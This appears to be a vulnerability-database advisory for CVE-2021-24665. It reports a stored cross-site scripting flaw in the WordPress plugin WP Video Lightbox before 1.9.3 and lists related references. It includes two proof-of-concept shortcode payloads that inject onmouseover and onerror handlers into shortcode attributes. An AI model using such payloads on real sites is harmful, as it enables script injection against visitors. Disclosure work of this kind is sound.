Lucene search
Vishnupriya Ilango WPEX-ID:42A8947F-2AE5-4F12-BD3D-AB3716501DF5HistoryAug 23, 2021 - 12:00 a.m.
WP Video Lightbox < 1.9.3 - Contributor+ Stored Cross-Site Scripting
2021-08-2300:00:00
Vishnupriya Ilango
82
0.001 Low
EPSS
Percentile
19.5%
The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks
[video_lightbox_vimeo5 video_id='"onmouseover=alert(/XSS/) b="' width="640" height="480" anchor="Click here to open vimeo video"]
[video_lightbox_vimeo5 video_id="13562192" width="640" height="480" anchor='http"onerror=alert(/XSS/)//']References
Related
cvelist
cvelist
cve
cve
CVE-2021-24665
2021-08-30 15:15:07
patchstack
patchstack
nvd
nvd
CVE-2021-24665
2021-08-30 15:15:07
wpvulndb
wpvulndb
WP Video Lightbox < 1.9.3 - Contributor+ Stored Cross-Site Scripting
2021-08-23 00:00:00
prion
prion
Cross site scripting
2021-08-30 15:15:00